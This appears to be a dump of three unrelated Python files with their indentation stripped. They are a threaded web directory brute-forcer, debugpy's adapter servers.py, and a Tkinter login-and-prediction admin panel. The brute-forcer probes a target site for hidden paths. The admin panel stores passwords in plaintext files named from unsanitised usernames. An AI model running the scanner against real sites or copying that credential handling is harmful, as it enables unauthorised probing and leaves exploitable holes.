for word in raw_words:
word = word.rstrip()
if resume is not None:
if found_resume:
words_queue.put(word)
else:
if word == resume:
found_resume = True
print("Resuming wordlist from: %s" % resume)
else:
words_queue.put(word)
return words_queue
# Brute force the URL using the directory list from build_wordlist and add extensions(optional)
def bruter(words, extension_file=None):
while not words.empty():
attempt = words.get()
attempt_list = []
# check if there is a file extension. If there is a file extension, we're brute forcing a file.
# If there isn't an extension, we're brute forcing a path.
if "." not in attempt:
attempt_list.append("/%s/" % attempt)
else:
attempt_list.append("/%s" % attempt)
# Is there an extension list?
if extension_file:
for extension in extension_file:
attempt_list.append("/%s%s" % (attempt, extension))
# Actual brute force part
for brute in attempt_list:
url = "%s%s" % (target_url, urllib.parse.quote(brute))
try:
headers = {"User-Agent": user_agent}
r = urllib.request.Request(url, headers=headers)
response = urllib.request.urlopen(r)
if len(response.read()):
print("[%d] => %s" % (response.code, url))
except urllib.error.URLError as e:
if hasattr(e, "code") and e.code != 404:
print("!!! %d => %s" % (e.code, url))
pass
word_queue = build_wordlist(wordlist)
for i in range(thread_count):
t = threading.Thread(target=bruter, args=(word_queue, extensions,))
t.start()
|
servers.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import subprocess
import sys
import threading
import time
import debugpy
from debugpy import adapter
from debugpy.common import compat, fmt, json, log, messaging, sockets
from debugpy.adapter import components
access_token = None
"""Access token used to authenticate with the servers."""
_lock = threading.RLock()
_connections = []
"""All servers that are connected to this adapter, in order in which they connected.
"""
_connections_changed = threading.Event()
class Connection(object):
"""A debug server that is connected to the adapter.
Servers that are not participating in a debug session are managed directly by the
corresponding Connection instance.
Servers that are participating in a debug session are managed by that sessions's
Server component instance, but Connection object remains, and takes over again
once the session ends.
"""
def __init__(self, sock):
from debugpy.adapter import sessions
self.disconnected = False
self.server = None
"""The Server component, if this debug server belongs to Session.
"""
self.pid = None
stream = messaging.JsonIOStream.from_socket(sock, str(self))
self.channel = messaging.JsonMessageChannel(stream, self)
self.channel.start()
try:
self.authenticate()
info = self.channel.request("pydevdSystemInfo")
process_info = info("process", json.object())
self.pid = process_info("pid", int)
self.ppid = process_info("ppid", int, optional=True)
if self.ppid == ():
self.ppid = None
self.channel.name = stream.name = str(self)
debugpy_dir = os.path.dirname(os.path.dirname(debugpy.__file__))
# Note: we must check if 'debugpy' is not already in sys.modules because the
# evaluation of an import at the wrong time could deadlock Python due to
# its import lock.
#
# So, in general this evaluation shouldn't do anything. It's only
# important when pydevd attaches automatically to a subprocess. In this
# case, we have to make sure that debugpy is properly put back in the game
# for users to be able to use it.v
#
# In this case (when the import is needed), this evaluation *must* be done
# before the configurationDone request is sent -- if this is not respected
# it's possible that pydevd already started secondary threads to handle
# commands, in which case it's very likely that this command would be
# evaluated at the wrong thread and the import could potentially deadlock
# the program.
#
# Note 2: the sys module is guaranteed to be in the frame globals and
# doesn't need to be imported.
inject_debugpy = """
if 'debugpy' not in sys.modules:
sys.path.insert(0, {debugpy_dir!r})
try:
import debugpy
finally:
del sys.path[0]
"""
inject_debugpy = fmt(inject_debugpy, debugpy_dir=debugpy_dir)
try:
self.channel.request("evaluate", {"expression": inject_debugpy})
except messaging.MessageHandlingError:
# Failure to inject is not a fatal error - such a subprocess can
# still be debugged, it just won't support "import debugpy" in user
# code - so don't terminate the session.
log.swallow_exception(
"Failed to inject debugpy into {0}:", self, level="warning"
)
with _lock:
# The server can disconnect concurrently before we get here, e.g. if
# it was force-killed. If the disconnect() handler has already run,
# don't register this server or report it, since there's nothing to
# deregister it.
if self.disconnected:
return
if any(conn.pid == self.pid for conn in _connections):
raise KeyError(
fmt("{0} is already connected to this adapter", self)
)
is_first_server = len(_connections) == 0
_connections.append(self)
_connections_changed.set()
except Exception:
log.swallow_exception("Failed to accept incoming server connection:")
self.channel.close()
# If this was the first server to connect, and the main thread is inside
# wait_until_disconnected(), we want to unblock it and allow it to exit.
dont_wait_for_first_connection()
# If we couldn't retrieve all the necessary info from the debug server,
# or there's a PID clash, we don't want to track this debuggee anymore,
# but we want to continue accepting connections.
return
parent_session = sessions.get(self.ppid)
if parent_session is None:
log.info("No active debug session for parent process of {0}.", self)
else:
try:
parent_session.client.notify_of_subprocess(self)
return
except Exception:
# This might fail if the client concurrently disconnects from the parent
# session. We still want to keep the connection around, in case the
# client reconnects later. If the parent session was "launch", it'll take
# care of closing the remaining server connections.
log.swallow_exception(
"Failed to notify parent session about {0}:", self
)
# If we got to this point, the subprocess notification was either not sent,
# or not delivered successfully. For the first server, this is expected, since
# it corresponds to the root process, and there is no other debug session to
# notify. But subsequent server connections represent subprocesses, and those
# will not start running user code until the client tells them to. Since there
# isn't going to be a client without the notification, such subprocesses have
# to be unblocked.
if is_first_server:
return
log.info("No clients to wait for - unblocking {0}.", self)
try:
self.channel.request("initialize", {"adapterID": "debugpy"})
self.channel.request("attach", {"subProcessId": self.pid})
self.channel.request("configurationDone")
self.channel.request("disconnect")
except Exception:
log.swallow_exception("Failed to unblock orphaned subprocess:")
self.channel.close()
def __str__(self):
return "Server" + fmt("[?]" if self.pid is None else "[pid={0}]", self.pid)
def authenticate(self):
if access_token is None and adapter.access_token is None:
return
auth = self.channel.request(
"pydevdAuthorize", {"debugServerAccessToken": access_token}
)
if auth["clientAccessToken"] != adapter.access_token:
self.channel.close()
raise RuntimeError('Mismatched "clientAccessToken"; server not authorized.')
def request(self, request):
raise request.isnt_valid(
"Requests from the debug server to the client are not allowed."
)
def event(self, event):
pass
def terminated_event(self, event):
self.channel.close()
def disconnect(self):
with _lock:
self.disconnected = True
if self.server is not None:
# If the disconnect happened while Server was being instantiated,
# we need to tell it, so that it can clean up via Session.finalize().
# It will also take care of deregistering the connection in that case.
self.server.disconnect()
elif self in _connections:
_connections.remove(self)
_connections_changed.set()
def attach_to_session(self, session):
"""Attaches this server to the specified Session as a Server component.
Raises ValueError if the server already belongs to some session.
"""
with _lock:
if self.server is not None:
raise ValueError
log.info("Attaching {0} to {1}", self, session)
self.server = Server(session, self)
class Server(components.Component):
"""Handles the debug server side of a debug session."""
message_handler = components.Component.message_handler
class Capabilities(components.Capabilities):
PROPERTIES = {
"supportsCompletionsRequest": False,
"supportsConditionalBreakpoints": False,
"supportsConfigurationDoneRequest": False,
"supportsDataBreakpoints": False,
"supportsDelayedStackTraceLoading": False,
"supportsDisassembleRequest": False,
"supportsEvaluateForHovers": False,
"supportsExceptionInfoRequest": False,
"supportsExceptionOptions": False,
"supportsFunctionBreakpoints": False,
"supportsGotoTargetsRequest": False,
"supportsHitConditionalBreakpoints": False,
"supportsLoadedSourcesRequest": False,
"supportsLogPoints": False,
"supportsModulesRequest": False,
"supportsReadMemoryRequest": False,
"supportsRestartFrame": False,
"supportsRestartRequest": False,
"supportsSetExpression": False,
"supportsSetVariable": False,
"supportsStepBack": False,
"supportsStepInTargetsRequest": False,
"supportsTerminateDebuggee": False,
"supportsTerminateRequest": False,
"supportsTerminateThreadsRequest": False,
"supportsValueFormattingOptions": False,
"exceptionBreakpointFilters": [],
"additionalModuleColumns": [],
"supportedChecksumAlgorithms": [],
}
def __init__(self, session, connection):
assert connection.server is None
with session:
assert not session.server
super(Server, self).__init__(session, channel=connection.channel)
self.connection = connection
assert self.session.pid is None
if self.session.launcher and self.session.launcher.pid != self.pid:
log.info(
"Launcher reported PID={0}, but server reported PID={1}",
self.session.launcher.pid,
self.pid,
)
self.session.pid = self.pid
session.server = self
@property
def pid(self):
"""Process ID of the debuggee process, as reported by the server."""
return self.connection.pid
@property
def ppid(self):
"""Parent process ID of the debuggee process, as reported by the server."""
return self.connection.ppid
def initialize(self, request):
assert request.is_request("initialize")
self.connection.authenticate()
request = self.channel.propagate(request)
request.wait_for_response()
self.capabilities = self.Capabilities(self, request.response)
# Generic request handler, used if there's no specific handler below.
@message_handler
def request(self, request):
# Do not delegate requests from the server by default. There is a security
# boundary between the server and the adapter, and we cannot trust arbitrary
# requests sent over that boundary, since they may contain arbitrary code
# that the client will execute - e.g. "runInTerminal". The adapter must only
# propagate requests that it knows are safe.
raise request.isnt_valid(
"Requests from the debug server to the client are not allowed."
)
# Generic event handler, used if there's no specific handler below.
@message_handler
def event(self, event):
self.client.propagate_after_start(event)
@message_handler
def initialized_event(self, event):
# pydevd doesn't send it, but the adapter will send its own in any case.
pass
@message_handler
def process_event(self, event):
# If there is a launcher, it's handling the process event.
if not self.launcher:
self.client.propagate_after_start(event)
@message_handler
def continued_event(self, event):
# https://github.com/microsoft/ptvsd/issues/1530
#
# DAP specification says that a step request implies that only the thread on
# which that step occurred is resumed for the duration of the step. However,
# for VS compatibility, pydevd can operate in a mode that resumes all threads
# instead. This is set according to the value of "steppingResumesAllThreads"
# in "launch" or "attach" request, which defaults to true. If explicitly set
# to false, pydevd will only resume the thread that was stepping.
#
# To ensure that the client is aware that other threads are getting resumed in
# that mode, pydevd sends a "continued" event with "allThreadsResumed": true.
# when responding to a step request. This ensures correct behavior in VSCode
# and other DAP-conformant clients.
#
# On the other hand, VS does not follow the DAP specification in this regard.
# When it requests a step, it assumes that all threads will be resumed, and
# does not expect to see "continued" events explicitly reflecting that fact.
# If such events are sent regardless, VS behaves erratically. Thus, we have
# to suppress them specifically for VS.
if self.client.client_id not in ("visualstudio", "vsformac"):
self.client.propagate_after_start(event)
@message_handler
def exited_event(self, event):
# If there is a launcher, it's handling the exit code.
if not self.launcher:
self.client.propagate_after_start(event)
@message_handler
def terminated_event(self, event):
# Do not propagate this, since we'll report our own.
self.channel.close()
def detach_from_session(self):
with _lock:
self.is_connected = False
self.channel.handlers = self.connection
self.channel.name = self.channel.stream.name = str(self.connection)
self.connection.server = None
def disconnect(self):
with _lock:
_connections.remove(self.connection)
_connections_changed.set()
super(Server, self).disconnect()
def serve(host="127.0.0.1", port=0):
global listener
listener = sockets.serve("Server", Connection, host, port)
return listener.getsockname()
def stop_serving():
try:
listener.close()
except Exception:
log.swallow_exception(level="warning")
def connections():
with _lock:
return list(_connections)
def wait_for_connection(session, predicate, timeout=None):
"""Waits until there is a server with the specified PID connected to this adapter,
and returns the corresponding Connection.
If there is more than one server connection already available, returns the oldest
one.
"""
def wait_for_timeout():
time.sleep(timeout)
wait_for_timeout.timed_out = True
with _lock:
_connections_changed.set()
wait_for_timeout.timed_out = timeout == 0
if timeout:
thread = threading.Thread(
target=wait_for_timeout, name="servers.wait_for_connection() timeout"
)
thread.daemon = True
thread.start()
if timeout != 0:
log.info("{0} waiting for connection from debug server...", session)
while True:
with _lock:
_connections_changed.clear()
conns = (conn for conn in _connections if predicate(conn))
conn = next(conns, None)
if conn is not None or wait_for_timeout.timed_out:
return conn
_connections_changed.wait()
def wait_until_disconnected():
"""Blocks until all debug servers disconnect from the adapter.
If there are no server connections, waits until at least one is established first,
before waiting for it to disconnect.
"""
while True:
_connections_changed.wait()
with _lock:
_connections_changed.clear()
if not len(_connections):
return
def dont_wait_for_first_connection():
"""Unblocks any pending wait_until_disconnected() call that is waiting on the
first server to connect.
"""
with _lock:
_connections_changed.set()
def inject(pid, debugpy_args):
host, port = listener.getsockname()
cmdline = [
sys.executable,
compat.filename(os.path.dirname(debugpy.__file__)),
"--connect",
host + ":" + str(port),
]
if adapter.access_token is not None:
cmdline += ["--adapter-access-token", adapter.access_token]
cmdline += debugpy_args
cmdline += ["--pid", str(pid)]
log.info("Spawning attach-to-PID debugger injector: {0!r}", cmdline)
try:
injector = subprocess.Popen(
cmdline,
bufsize=0,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
except Exception as exc:
log.swallow_exception(
"Failed to inject debug server into process with PID={0}", pid
)
raise messaging.MessageHandlingError(
fmt(
"Failed to inject debug server into process with PID={0}: {1}", pid, exc
)
)
# We need to capture the output of the injector - otherwise it can get blocked
# on a write() syscall when it tries to print something.
def capture_output():
while True:
line = injector.stdout.readline()
if not line:
break
log.info("Injector[PID={0}] output:\n{1}", pid, line.rstrip())
log.info("Injector[PID={0}] exited.", pid)
thread = threading.Thread(
target=capture_output, name=fmt("Injector[PID={0}] output", pid)
)
thread.daemon = True
thread.start()
|
AdminPanel.py
|
#import modules
from os import curdir
from tkinter import *
import os
import tkinter.filedialog
import numpy as np
from numpy.lib.function_base import append
from numpy.lib.polynomial import polyfit
from pandas.core import frame
from styleframe import StyleFrame, utils
import pandas as pd
import numpy as np
import csv
from tkmagicgrid import *
from tkinter import ttk
import threading
import json
from pathlib import Path
from storykey import storykey
from tire import GeneticRisk
from multiprocessing import Process
class ProcessParallel(object):
"""
To Process the functions parallely
"""
def __init__(self, *jobs):
"""
"""
self.jobs = jobs
self.processes = []
def fork_processes(self):
"""
Creates the process objects for given function deligates
"""
for job in self.jobs:
proc = Process(target=job)
self.processes.append(proc)
def start_all(self):
"""
Starts the functions process all together.
"""
for proc in self.processes:
proc.start()
def join_all(self):
"""
Waits untill all the functions executed.
"""
for proc in self.processes:
proc.join()
try:
sys.stdout.write("\n")
sys.stdout.flush()
except:
class dummyStream:
''' dummyStream behaves like a stream but does nothing. '''
def __init__(self): pass
def write(self,data): pass
def read(self,data): pass
def flush(self): pass
def close(self): pass
# and now redirect all default streams to this dummyStream:
sys.stdout = dummyStream()
sys.stderr = dummyStream()
sys.stdin = dummyStream()
sys.__stdout__ = dummyStream()
sys.__stderr__ = dummyStream()
sys.__stdin__ = dummyStream()
# Designing window for registration
def register():
global register_screen
register_screen = Toplevel(main_screen)
ico_path = curdir+"\media\my_icon.ico"
register_screen.iconbitmap(ico_path)
register_screen.title("Register")
register_screen.geometry("300x250")
global username
global password
global username_entry
global password_entry
global username_data
global password_data
global start_code
global end_code
global username_data
global password_data
global start_code
global end_code
username_data = StringVar()
password_data = StringVar()
start_code = StringVar()
end_code = StringVar()
username = StringVar()
password = StringVar()
Label(register_screen, text="Please enter details below", bg="blue").pack()
Label(register_screen, text="").pack()
username_lable = Label(register_screen, text="Username * ")
username_lable.pack()
username_entry = Entry(register_screen, textvariable=username)
username_entry.pack()
password_lable = Label(register_screen, text="Password * ")
password_lable.pack()
password_entry = Entry(register_screen, textvariable=password, show='*')
password_entry.bind('<Return>', register_user)
password_entry.pack()
Label(register_screen, text="").pack()
Button(register_screen, text="Register", width=10, height=1, bg="blue", command = register_user).pack()
# Designing window for login
def login():
global login_screen
login_screen = Toplevel(main_screen)
login_screen.title("Login")
login_screen.geometry("300x250")
ico_path = curdir+"\media\my_icon.ico"
login_screen.iconbitmap(ico_path)
Label(login_screen, text="Please enter details below to login").pack()
Label(login_screen, text="").pack()
global username_verify
global password_verify
username_verify = StringVar()
password_verify = StringVar()
global username_login_entry
global password_login_entry
Label(login_screen, text="Username * ").pack()
username_login_entry = Entry(login_screen, textvariable=username_verify)
username_login_entry.pack()
Label(login_screen, text="").pack()
Label(login_screen, text="Password * ").pack()
password_login_entry = Entry(login_screen, textvariable=password_verify, show= '*')
password_login_entry.bind('<Return>', login_verify)
password_login_entry.pack()
Label(login_screen, text="").pack()
Button(login_screen, text="Login", width=10, height=1, command = login_verify).pack()
# Implementing event on register button
def register_user(event=None):
username_info = username.get()
password_info = password.get()
file = open("user_credential_database/" + username_info, "w")
file.write(username_info + "\n")
file.write(password_info)
file.close()
username_entry.delete(0, END)
password_entry.delete(0, END)
Label(register_screen, text="Registration Success", fg="green", font=("calibri", 11)).pack()
register_screen.after(700,register_screen.destroy)
# Implementing event on login button
def login_verify(event=None):
username1 = username_verify.get()
password1 = password_verify.get()
username_login_entry.delete(0, END)
password_login_entry.delete(0, END)
current_directory = os.getcwd()
user_credential_directory = current_directory + '/'+"user_credential_database/"
list_of_files = os.listdir(user_credential_directory)
if username1 in list_of_files:
file1 = open(user_credential_directory + username1, "r")
verify = file1.read().splitlines()
if password1 in verify:
login_sucess()
else:
password_not_recognised()
else:
user_not_found()
# Designing popup for login success
def login_sucess():
global login_success_screen
login_success_screen = Toplevel(login_screen)
ico_path = curdir+"\media\my_icon.ico"
login_success_screen.iconbitmap(ico_path)
login_success_screen.title("Success")
login_success_screen.geometry("150x100")
Label(login_success_screen, text="Login Success").pack()
Button(login_success_screen, text="OK", command=del_and_open).pack()
login_success_screen.after(500, del_and_open)
def del_and_open():
delete_login_success()
application_window()
class application_window:
def __init__(self):
self.root = Tk()
frame = self.root
ico_path = curdir+"\media\my_icon.ico"
frame.iconbitmap(ico_path)
frame.title("Predictive AI Application Window")
frame.geometry("1024x1024")
self.current_dir = curdir
b1 = tkinter.Button(frame, text='Select Master Sheet',width=15, height=2, command=self.get_path_master).place(x=30, y=50)
b2 = tkinter.Button(frame, text='Select Multiple Test Sheets (use ctrl + click to select)',width=40, height=2, command=self.get_path_test).place(x=300,y=50)
#las - Label(frame,)
self.progressbar = ttk.Progressbar(frame, mode='determinate',cursor='spider',length=300)
self.progressbar.grid(column=1, row=0, sticky=W)
self.progressbar["maximum"] = 100
self.progressbar["value"] = 0
"""photo_login = PhotoImage(file = curdir+"\predict.png")
Button(text = ' Predict Now!', height="80", width="200", image = photo_login,
compound = LEFT, command = lambda:self.start_submit_thread(None)).place(x=90,y=150)"""
#ttk.Button(frame, text="Predict Now",
b3 = tkinter.Button(frame, text='Predict Now!',width=15, height=2 ,command= lambda:self.start_submit_thread(None)).place(x=90,y=150)
"b2.pack(fill='x')"
def get_path_master(self):
if not os.path.exists('AI External-Outputs/path_info.txt'):
check_from = curdir
else:
file = open("AI External-Outputs/path_info.txt","r")
for lines in file.read().splitlines():
if lines[0] == "M":
check_from = os.path.dirname(lines[1:])
file.close()
self.master_sheet_filepath = tkinter.filedialog.askopenfilename(parent=self.root, initialdir= check_from ,title='Please Choose Master Sheet',filetypes=[('Excel File', '.xlsx'),('CSV Excel file', '.csv')])
def get_path_test(self):
if not os.path.exists('AI External-Outputs/path_info.txt'):
check_from = curdir
else:
file = open("AI External-Outputs/path_info.txt","r")
for lines in file.read().splitlines():
if lines[0] == "T":
check_from = os.path.dirname(lines[1:])
file.close()
self.test_sheet_filepaths = list(tkinter.filedialog.askopenfilenames(parent=self.root, initialdir=check_from,title='Please Choose Test Sheet',filetypes=[('Excel File', '.xlsx'),('CSV Excel file', '.csv')]))
"""print(f)"""
def get_prediction(self):
def read_master_sheet(filepath):
sf = StyleFrame.read_excel(filepath , read_style=True, use_openpyxl_styles=False)
return sf
def df_column_uniquify(df):
df_columns = df.columns
new_columns = []
for item in df_columns:
counter = 0
newitem = item
while newitem in new_columns:
counter += 1
newitem = "{}_{}".format(item, counter)
new_columns.append(newitem)
df.columns = new_columns
return df
def read_data(filepath):
df = pd.read_excel(filepath)
return df
def get_standard_matrix(sf):
f = open('Value-json/hyperparam.json')
hyperparam = json.load(f)
"""
def only_cells_with_red_text(cell):
if cell!=cell:
return hyperparam['empty']
if cell.style.bg_color in {utils.colors.red, 'FFFF0000'}:
return 150
if cell.style.font_color in {utils.colors.green, 'FF00B050'}:
return hyperparam['green']
elif cell.style.font_color in {utils.colors.yellow, '00FFFF00'}:
return hyperparam['yellow']
elif cell.style.font_color in {utils.colors.purple, '800080'}:
return hyperparam['purple']
elif cell.style.font_color in {utils.colors.red, 'FFFF0000'}:
return hyperparam['red']
elif cell.style.font_color in {utils.colors.blue, 'FF0070C0'}:
return hyperparam['blue']
elif cell.style.font_color in {utils.colors.black, '00000000'}:
return hyperparam['black']
else:
return 100
def only_cells_with_red_text_emp(cell):
if cell!=cell:
return 0
if cell.style.bg_color in {utils.colors.red, 'FFFF0000'}:
return 150
if cell.style.font_color in {utils.colors.green, 'FF00B050'}:
return hyperparam['green']
elif cell.style.font_color in {utils.colors.yellow, '00FFFF00'}:
return hyperparam['yellow']
elif cell.style.font_color in {utils.colors.purple, '800080'}:
return hyperparam['purple']
elif cell.style.font_color in {utils.colors.red, 'FFFF0000'}:
return hyperparam['red']
elif cell.style.font_color in {utils.colors.blue, 'FF0070C0'}:
return hyperparam['blue']
elif cell.style.font_color in {utils.colors.black, '00000000'}:
return hyperparam['black']
else:
return 100
"""
def only_cells_with_red_text(cell):
if cell!=cell:
return hyperparam['empty']
elif '#' in str(cell.value) and '(' in str(cell.value):
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = float(cert[1])
return cer
else:
if '(' in str(cell.value):
if cell.style.bg_color in {utils.colors.red, 'FFFF0000'}:
return 150
if cell.style.font_color in {utils.colors.green, 'FF00B050'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['green']
elif cer[0] == 'V':
return float(cer[1])
elif cell.style.font_color in {utils.colors.yellow, '00FFFF00'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['yellow']
elif cer[0] == 'V':
return float(cer[1])
elif cell.style.font_color in {utils.colors.purple, '800080'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
#print(cer)
if cer[0] == 'C':
return hyperparam['purple']
elif cer[0] == 'V':
return float(cer[1])
elif cell.style.font_color in {utils.colors.red, 'FFFF0000'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['red']
elif cer[0] == 'V':
return float(cer[1])
elif cell.style.font_color in {utils.colors.blue, 'FF0070C0'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['blue']
elif cer[0] == 'V':
return float(cer[1])
elif cell.style.font_color in {utils.colors.black, '00000000'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['black']
elif cer[0] == 'V':
return float(cer[1])
else:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['black']
elif cer[0] == 'V':
return float(cer[1])
else:
return 0.00000001
def only_cells_with_red_text_emp(cell):
if cell!=cell:
return 0
elif '(' in str(cell.value):
if cell.style.bg_color in {utils.colors.red, 'FFFF0000'}:
return 150
if cell.style.font_color in {utils.colors.green, 'FF00B050'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['green']
elif cer[0] == 'V':
return float(cer[1])
elif cell.style.font_color in {utils.colors.yellow, '00FFFF00'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['yellow']
elif cer[0] == 'V':
return float(cer[1])
elif cell.style.font_color in {utils.colors.purple, '800080'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['purple']
elif cer[0] == 'V':
return float(cer[1])
elif cell.style.font_color in {utils.colors.red, 'FFFF0000'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['red']
elif cer[0] == 'V':
return float(cer[1])
elif cell.style.font_color in {utils.colors.blue, 'FF0070C0'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['blue']
elif cer[0] == 'V':
return float(cer[1])
elif cell.style.font_color in {utils.colors.black, '00000000'}:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['black']
elif cer[0] == 'V':
return float(cer[1])
else:
check = cell.value
check = check[:-1]
cert = check.split('(')
cer = cert[1].split(',')
if cer[0] == 'C':
return hyperparam['black']
elif cer[0] == 'V':
return float(cer[1])
else:
return 0.0000001
sf_2 = StyleFrame(sf.applymap(only_cells_with_red_text))
sf_3 = StyleFrame(sf.applymap(only_cells_with_red_text_emp))
# passing a tuple to pandas.dropna is deprecated since pandas 0.23.0, but this can be
# avoided by simply calling dropna twice, once with axis=0 and once with axis=1
def get_sum(sf_3):
sf_3.to_excel(curdir+'/AI Internal-Outputs/output_0.xlsx').save()
df = read_data(curdir+'/AI Internal-Outputs/output_0.xlsx')
code_dict = []
lent = 0
for col in df.columns:
if 'Code' in col:
lent = lent + 1
for i in range(1,lent):
code_dict.append("Code "+str(i))
qf=[]
df = df.fillna(0)
for col in code_dict:
if any(i == 150 for i in df[col].values):
qf.append(col)
qualifying_dict = {}
df = df.iloc[3:,6:]
for col_n in qf:
idx = int(col_n.split()[1])
df_n = df.iloc[:,idx-1]
qualifying_dict[col_n] = df_n.values
standard_matrix = df.values
def sumColumn(matrix):
return np.sum(matrix, axis=0)
#sum_std_mat = sumColumn(standard_matrix)
return standard_matrix
#print(qualifying_dict)
sf_2.to_excel(curdir+'/AI Internal-Outputs/output.xlsx').save()
df = read_data(curdir+'/AI Internal-Outputs/output.xlsx')
code_dict = []
lent = 0
for col in df.columns:
if 'Code' in col:
lent = lent + 1
#print(lent)
for i in range(1,lent):
code_dict.append("Code "+str(i))
qf=[]
df = df.fillna(0)
for col in code_dict:
if any(i == 150 for i in df[col].values):
qf.append(col)
qualifying_dict = {}
df = df.iloc[3:,6:]
for col_n in qf:
idx = int(col_n.split()[1])
df_n = df.iloc[:,idx-1]
qualifying_dict[col_n] = df_n.values
standard_matrix = df.values
print(standard_matrix)
#print(standard_matrix)
return standard_matrix,qualifying_dict,get_sum(sf_3),lent
def get_age_decision(age,lent):
code_dict = []
for i in range(1,lent):
code_dict.append("Code "+str(i))
dicte = dict.fromkeys(code_dict, 0)
prediction_codes = []
if age<35:
dicte['Code 1']=120
prediction_codes.append("Code 1")
if 30<age<50:
dicte['Code 2']=100
prediction_codes.append("Code 2")
if 10<age<58:
dicte['Code 3']=100
dicte['Code 5']=100
dicte['Code 7']=100
dicte['Code 13']=100
dicte['Code 14']=100
dicte['Code 15']=100
prediction_codes.append("Code 3")
prediction_codes.append("Code 5")
prediction_codes.append("Code 7")
prediction_codes.append("Code 13")
prediction_codes.append("Code 14")
prediction_codes.append("Code 15")
if age<55:
dicte['Code 12']=100
prediction_codes.append("Code 12")
if 10<age<68:
dicte['Code 16']=100
prediction_codes.append("Code 16")
if age<45:
dicte['Code 18']=100
prediction_codes.append("Code 45")
if 20<age<52:
dicte['Code 28']=100
prediction_codes.append("Code 28")
if 45<age<58:
dicte['Code 30']=100
dicte['Code 31']=100
prediction_codes.append("Code 30")
prediction_codes.append("Code 31")
if 12<age<60:
dicte['Code 33']=100
prediction_codes.append("Code 33")
if 12<age<58:
dicte['Code 35']=100
prediction_codes.append("Code 35")
if 10<age<60:
dicte['Code 37']=100
dicte['Code 38']=100
prediction_codes.append("Code 37")
prediction_codes.append("Code 38")
if age:
prediction_codes.append("Code 4")
prediction_codes.append("Code 6")
prediction_codes.append("Code 8")
prediction_codes.append("Code 9")
prediction_codes.append("Code 10")
prediction_codes.append("Code 11")
prediction_codes.append("Code 17")
prediction_codes.append("Code 19")
prediction_codes.append("Code 20")
prediction_codes.append("Code 21")
prediction_codes.append("Code 22")
prediction_codes.append("Code 23")
prediction_codes.append("Code 24")
prediction_codes.append("Code 25")
prediction_codes.append("Code 26")
prediction_codes.append("Code 27")
prediction_codes.append("Code 29")
prediction_codes.append("Code 32")
prediction_codes.append("Code 34")
prediction_codes.append("Code 36")
dicte["Code 4"]=100
dicte["Code 6"]=100
dicte["Code 8"]=100
dicte["Code 9"]=100
dicte["Code 10"]=100
dicte["Code 11"]=100
dicte["Code 17"]=100
dicte["Code 19"]=100
dicte["Code 20"]=100
dicte["Code 21"]=100
dicte["Code 22"]=100
dicte["Code 23"]=100
dicte["Code 24"]=100
dicte["Code 25"]=100
dicte["Code 26"]=100
dicte["Code 27"]=100
dicte["Code 29"]=100
dicte["Code 32"]=100
dicte["Code 34"]=100
dicte["Code 36"]=100
return dicte,prediction_codes
def get_percentile(score_arr,sum_std_mat,idx_file,df_attempt):
"""
ptile = [ (len(list(np.where(np.array(x)<=i)[0]))/len(x))*100 for i in x]
"""
cnt = 0
master_attempt = np.where(sum_std_mat ==0,0,1)
score_mul = df_attempt.T @ master_attempt
score_mul = [i * 120 for i in score_mul]
unique_score = score_mul
max_v = np.max(score_arr)
inx = max_v
comp_std = []
for inx,val in enumerate(score_arr):
try:
bck = (val/unique_score[idx_file[-inx-1]])*100
except:
bck = 127.7789
bck = bck/10
comp_std.append(bck)
if val>0:
cnt+=1
inx = val
if max_v == 0:
max_v = 1
mulk = (max_v - inx)/max_v
scorecard = [(((i/max_v)*100)-(cnt*mulk)*2.2132) for i in score_arr]
return scorecard,comp_std
def get_qualify(attempt,qualify_dict,lent):
code_dict = []
for i in range(1,lent):
code_dict.append("Code "+str(i))
hell_dict = dict.fromkeys(code_dict, 1)
for key,val in qualify_dict.items():
check = np.where(np.logical_and(val==150, attempt==1))[0]
#print(key)
#print(check)
if len(check)>0:
hell_dict[key]= 1
else:
hell_dict[key]= -100000
#print(hell_dict)
return hell_dict
def get_test_output(df, col_number):
#df = read_data(filepath)
chl = 0
chlt = 0
for inx,rows in df.iterrows():
if rows['Sub-Feature'] == "external factor":
chl = inx
for inx,rows in df.iterrows():
if rows['Sub-Feature'] == "DropDowns":
chlt = inx
df_check = df.iloc[chl+1:chlt-7]
df = df[[col_number]]
ethinicity = df.iloc[4:5].values[0]
age = df.iloc[5:6].values[0]
age = age[0]
ethinicity = str(ethinicity[0])
df_check = df_check.fillna(0)
#print(df_check)
to_check_array = df_check[col_number].values
#print(to_check_array)
return to_check_array,age,ethinicity
def get_top_5_predictions(to_check_array,age,standard_matrix,qualifying_dict,sum_std_mat,ethnicity,col_number,lent,mat_master_dict,to_check_dict):
""" dicte,prediction_codes = get_age_decision(age)
to_check_array_match = np.where(to_check_array == 0, 0, 1)
tat_val_match = np.dot(to_check_array_match.T,standard_matrix)
